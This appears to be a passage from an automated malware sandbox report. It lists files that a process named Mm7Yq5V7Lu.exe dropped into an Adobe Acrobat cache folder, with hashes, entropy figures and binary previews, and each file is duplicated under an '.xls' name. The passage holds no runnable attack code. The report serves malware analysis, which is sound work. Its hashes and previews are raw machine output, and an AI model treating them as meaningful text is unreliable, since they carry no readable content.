                                                                                                                                                      Preview: y......b..+....$(L...E.`8..<.t...s..qq8i.]]..z.WJn...T.qk8f.v;.....j..!O.`......,g0.l.#...".5...........C5.u..I.D-...l.......8`.Z...9..z.t.j..7....N8 ...t..CS.<.{.....1..r)....U.=.Gd....1.4....rlq?..........Bf..`n..XBgU.c.{...;....B.+k{..&.n.j...F....+...".x.b.q..IXI$....(.6.x..@...- V.j29..3f.`.L...p.q67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\91cec06bb2836fa5_0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1152
                                                                                                                                                      Entropy (8bit):5.706431471831273
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:Q7v2Mcp3rmtp4Rxl9zK8sevWAVgKTaCB7RZ0cHYIgtyUzdh6kZ4:AvIStp4RxzzCwgck38Ah6f
                                                                                                                                                      MD5:10C7364EC482F4FFF5ACD79C710A8C06
                                                                                                                                                      SHA1:9F97EC849A7D39C6E0D928502FA168916C9E5A6A
                                                                                                                                                      SHA-256:AB2D45783713B3162BC97AA2D1C2F713831B5031E42BAB3120E124DF62D0B5D7
                                                                                                                                                      SHA-512:7D4CCB6376983B49A7258C34C973687AF45C00B8C423BEF77C054D0B11E14F435BE67126AD831E2ED96486131B168C20BA0C3CFD7221B908A78A002D27476350
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .......B.p..$r..'..5S..$....tbs...F..t#..3...l.X..:Co.i..d.A..g.......@..k0.o%.'<C.B~.6.....IYg......... .....w.p.O.x2.=.9.._.*! qD]..C.5...".....6........*.Aq.h..y........Rn'.}..#2..q.{=.o'.=.;Q.N..!.w58..7..%a.-...?...~(...*.. ".._'.....G.....o6...J.,.#J..oC.d.Q..s+...)c!.Q.b%.r...q.Y.d....^....H'.B~M..B.d......U...67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\91cec06bb2836fa5_0.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1152
                                                                                                                                                      Entropy (8bit):5.706431471831273
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:Q7v2Mcp3rmtp4Rxl9zK8sevWAVgKTaCB7RZ0cHYIgtyUzdh6kZ4:AvIStp4RxzzCwgck38Ah6f
                                                                                                                                                      MD5:10C7364EC482F4FFF5ACD79C710A8C06
                                                                                                                                                      SHA1:9F97EC849A7D39C6E0D928502FA168916C9E5A6A
                                                                                                                                                      SHA-256:AB2D45783713B3162BC97AA2D1C2F713831B5031E42BAB3120E124DF62D0B5D7
                                                                                                                                                      SHA-512:7D4CCB6376983B49A7258C34C973687AF45C00B8C423BEF77C054D0B11E14F435BE67126AD831E2ED96486131B168C20BA0C3CFD7221B908A78A002D27476350
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .......B.p..$r..'..5S..$....tbs...F..t#..3...l.X..:Co.i..d.A..g.......@..k0.o%.'<C.B~.6.....IYg......... .....w.p.O.x2.=.9.._.*! qD]..C.5...".....6........*.Aq.h..y........Rn'.}..#2..q.{=.o'.=.;Q.N..!.w58..7..%a.-...?...~(...*.. ".._'.....G.....o6...J.,.#J..oC.d.Q..s+...)c!.Q.b%.r...q.Y.d....^....H'.B~M..B.d......U...67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\927a1596c37ebe5e_0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.746688051319197
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:qNEp5l7vnzK8sevWAVgKTaCB7RZ0cHYIgtyUzW3:qNG1vnzCwgck38n3
                                                                                                                                                      MD5:2981B489CFBCAF581E85BFF3BB6106C1
                                                                                                                                                      SHA1:1185EF7F86BB8A172448704E4E6082BF33527FF9
                                                                                                                                                      SHA-256:139B393A4806A473681A844A40FD4D822CD587D69AB4EFEDC0E0D3C17C43EB42
                                                                                                                                                      SHA-512:093E70FE2859EBBCE2EFAA30BFADF7E97597FAF627FB7F7C940BB80328A7B0C9880EEE09E31AC582AAE2F8364C71D756282D6A11B46613A7A295052D407C81EF
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ...#p.......R..E.VN.......RPH..c...Q.D...e)1....FJ..Feq.X\tn.0F..c..R.'...15].........J.h9eb:.&....WP....\.....gbl8..M..2@....oB...u..).y.(.]2.)g.B?....;.G..c..DD$...Wk.."....MZ#..k2.r.lEY.....%P..f.......5*Q.p..Ma'...P.......A.zo.S..-3.G..U...+".2F|.).O.M/.(g.`.R..n.)N....F..E.....fA.\.....~.x1..2..F..Y..#Hv:....h.......Z...{......M<67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\927a1596c37ebe5e_0.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.746688051319197
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:qNEp5l7vnzK8sevWAVgKTaCB7RZ0cHYIgtyUzW3:qNG1vnzCwgck38n3
                                                                                                                                                      MD5:2981B489CFBCAF581E85BFF3BB6106C1
                                                                                                                                                      SHA1:1185EF7F86BB8A172448704E4E6082BF33527FF9
                                                                                                                                                      SHA-256:139B393A4806A473681A844A40FD4D822CD587D69AB4EFEDC0E0D3C17C43EB42
                                                                                                                                                      SHA-512:093E70FE2859EBBCE2EFAA30BFADF7E97597FAF627FB7F7C940BB80328A7B0C9880EEE09E31AC582AAE2F8364C71D756282D6A11B46613A7A295052D407C81EF
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ...#p.......R..E.VN.......RPH..c...Q.D...e)1....FJ..Feq.X\tn.0F..c..R.'...15].........J.h9eb:.&....WP....\.....gbl8..M..2@....oB...u..).y.(.]2.)g.B?....;.G..c..DD$...Wk.."....MZ#..k2.r.lEY.....%P..f.......5*Q.p..Ma'...P.......A.zo.S..-3.G..U...+".2F|.).O.M/.(g.`.R..n.)N....F..E.....fA.\.....~.x1..2..F..Y..#Hv:....h.......Z...{......M<67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\92c56fa2a6c4d5ba_0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.777867316122329
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:w7/wH7dBlqzZGaH/wBzK8sevWAVgKTaCB7RZ0cHYIgtyUzWrm:swD0G+CzCwgck38trm
                                                                                                                                                      MD5:3C24F595117D0393A4D4F4239C5D5F95
                                                                                                                                                      SHA1:09FB56A6A991AF39CE0FF069F0F404EBBBDAA682
                                                                                                                                                      SHA-256:20CB5955E29D0771EB5D266679998F0BA7137551AB3336BF735C548556A958A9
                                                                                                                                                      SHA-512:59DBBAFB02B4094D18A3C68C14A22ACCD3BB44736C2AA4F5FBD3AE8C3DC635C6DB939657676773475B027D3F6279CE38CA2BEFD318EE4CDE535FEB1144232E1E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ...g...J.x...n..0K..c.&9......0(-..z'.U..cav...X.1..........%l. >...N.\..s..).f...0....z..D.d&6o3-..x....Y!I.UMX....HRK....j.0..5...w.......E.v...`(.M.n9..M Y.....5...m5....4..^.=.92^sY..{8....;.ppa....h..3.X*>.ZP...`2i/...#O3.m......<n].."..|G..........fe...0/g.'..h.........0..:......x.i.....,g~...[..U..vb.h^......nB.7....%..@67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\92c56fa2a6c4d5ba_0.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.777867316122329
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:w7/wH7dBlqzZGaH/wBzK8sevWAVgKTaCB7RZ0cHYIgtyUzWrm:swD0G+CzCwgck38trm
                                                                                                                                                      MD5:3C24F595117D0393A4D4F4239C5D5F95
                                                                                                                                                      SHA1:09FB56A6A991AF39CE0FF069F0F404EBBBDAA682
                                                                                                                                                      SHA-256:20CB5955E29D0771EB5D266679998F0BA7137551AB3336BF735C548556A958A9
                                                                                                                                                      SHA-512:59DBBAFB02B4094D18A3C68C14A22ACCD3BB44736C2AA4F5FBD3AE8C3DC635C6DB939657676773475B027D3F6279CE38CA2BEFD318EE4CDE535FEB1144232E1E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ...g...J.x...n..0K..c.&9......0(-..z'.U..cav...X.1..........%l. >...N.\..s..).f...0....z..D.d&6o3-..x....Y!I.UMX....HRK....j.0..5...w.......E.v...`(.M.n9..M Y.....5...m5....4..^.=.92^sY..{8....;.ppa....h..3.X*>.ZP...`2i/...#O3.m......<n].."..|G..........fe...0/g.'..h.........0..:......x.i.....,g~...[..U..vb.h^......nB.7....%..@67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\946896ee27df7947_0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.800858940491257
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:WceciuFVNdvDeRzK8sevWAVgKTaCB7RZ0cHYIgtyUzurc:eciSLvDEzCwgck38Trc
                                                                                                                                                      MD5:ADFB2B38D0668AFCF66379B3A2F3BD8B
                                                                                                                                                      SHA1:C8FD8D486D3B23E3CC92B25AA946DD073B857244
                                                                                                                                                      SHA-256:9A704AB23A4CDF376F38EEF4E68E5297277DAE1F621AC5DEFC3BFD7CBBCA5017
                                                                                                                                                      SHA-512:E56065831158FF82981758659A6AFDB5C970A6E02B900F602729A418D1FF116FA48936B0A4FADA4141C57CCFFCF000167E193CB2235F36979A287094F9DEE361
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..VY......?...t..K.a+...N.N.......M.a..J.9.s...[W..%:..........U.C'h........7.....h.).p4..?..[.Q&$..g...|y....qh.Pu....%..o.'..c.-.....1...>,....iE.+3@..R....n*..l.V..L..kYB.....|s..%.2....."d..<9...+...'...*........3}...2s........M..H.....LU..9..$..zz..\.".}....e......x........9dS.V.HT....Dg.R...#....J.DD.I..{*C.1J..../..c......:b67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\946896ee27df7947_0.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.800858940491257
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:WceciuFVNdvDeRzK8sevWAVgKTaCB7RZ0cHYIgtyUzurc:eciSLvDEzCwgck38Trc
                                                                                                                                                      MD5:ADFB2B38D0668AFCF66379B3A2F3BD8B
                                                                                                                                                      SHA1:C8FD8D486D3B23E3CC92B25AA946DD073B857244
                                                                                                                                                      SHA-256:9A704AB23A4CDF376F38EEF4E68E5297277DAE1F621AC5DEFC3BFD7CBBCA5017
                                                                                                                                                      SHA-512:E56065831158FF82981758659A6AFDB5C970A6E02B900F602729A418D1FF116FA48936B0A4FADA4141C57CCFFCF000167E193CB2235F36979A287094F9DEE361
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..VY......?...t..K.a+...N.N.......M.a..J.9.s...[W..%:..........U.C'h........7.....h.).p4..?..[.Q&$..g...|y....qh.Pu....%..o.'..c.-.....1...>,....iE.+3@..R....n*..l.V..L..kYB.....|s..%.2....."d..<9...+...'...*........3}...2s........M..H.....LU..9..$..zz..\.".}....e......x........9dS.V.HT....Dg.R...#....J.DD.I..{*C.1J..../..c......:b67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\983b7a3da8f39a46_0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1152
                                                                                                                                                      Entropy (8bit):5.736713688353959
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:llclB5xqNA4xeIRB/XGp3zK8sevWAVgKTaCB7RZ0cHYIgtyUzF9:Unqe4J/GpzCwgck38y
                                                                                                                                                      MD5:1BEA8ADE50AA3352D24447017765758B
                                                                                                                                                      SHA1:BA4F3E605B5E2FA3A8596B776D428A11C87F4BD3
                                                                                                                                                      SHA-256:7261A6A8919696589541A41B4F41F35C719601F0F5E6EDC6BC352E9F2EFFED6F
                                                                                                                                                      SHA-512:8B2AD5DA87872DE501C89B68F89B52B3A74F07402315628F3AB3A33B5631BAC3F5D4A193BB1B763206FE518434E68A945344D1BFF36851FA47BD950462093D72
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: /... .......^9..#.Hs......X..N.i....1.8p.........x.....J.1T.....-.*..v...._.`.)yX.kr%6..^.~..6.z7.....o5...os.l.*...w..3.;..;....#...n...T:..R.Ov..>..(..VRs;.`".....-..........O2...9k..X.q.b....M.p..m..).,..\i.`.).....?J3..4.5k.K........R.@{.j.....B.C.3...{....).v..g.8#~12..M..v..iQ^']x._.p....h..U"3@J.f..Uo..H...H67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\983b7a3da8f39a46_0.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1152
                                                                                                                                                      Entropy (8bit):5.736713688353959
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:llclB5xqNA4xeIRB/XGp3zK8sevWAVgKTaCB7RZ0cHYIgtyUzF9:Unqe4J/GpzCwgck38y
                                                                                                                                                      MD5:1BEA8ADE50AA3352D24447017765758B
                                                                                                                                                      SHA1:BA4F3E605B5E2FA3A8596B776D428A11C87F4BD3
                                                                                                                                                      SHA-256:7261A6A8919696589541A41B4F41F35C719601F0F5E6EDC6BC352E9F2EFFED6F
                                                                                                                                                      SHA-512:8B2AD5DA87872DE501C89B68F89B52B3A74F07402315628F3AB3A33B5631BAC3F5D4A193BB1B763206FE518434E68A945344D1BFF36851FA47BD950462093D72
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: /... .......^9..#.Hs......X..N.i....1.8p.........x.....J.1T.....-.*..v...._.`.)yX.kr%6..^.~..6.z7.....o5...os.l.*...w..3.;..;....#...n...T:..R.Ov..>..(..VRs;.`".....-..........O2...9k..X.q.b....M.p..m..).,..\i.`.).....?J3..4.5k.K........R.@{.j.....B.C.3...{....).v..g.8#~12..M..v..iQ^']x._.p....h..U"3@J.f..Uo..H...H67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\aba6710fde0876af_0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1136
                                                                                                                                                      Entropy (8bit):5.642925221225804
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:INLDGfdYO5zK8sevWAVgKTaCB7RZ0cHYIgtyUznMG:mDGfdYIzCwgck38tG
                                                                                                                                                      MD5:1BFD6AD685ACE3D975722BF42BE534B1
                                                                                                                                                      SHA1:DAEFF1232358FBF56AD6D27854E4D02749F2AD2E
                                                                                                                                                      SHA-256:0EA9FE19ACE592600AAF7A599AA5C50DB678640DDD240C9E4CEF6FD91D07D881
                                                                                                                                                      SHA-512:9BD6C58BB34A95CABB0909E87DB9170E8DD37F9BA1FAC9DC973B8B5C533F3B59CABE1625CE6AE6071E0DCEA83F9D2B279EE1F309439F84CE476F32C62A3D6DC4
                                                                                                                                                      Malicious:false
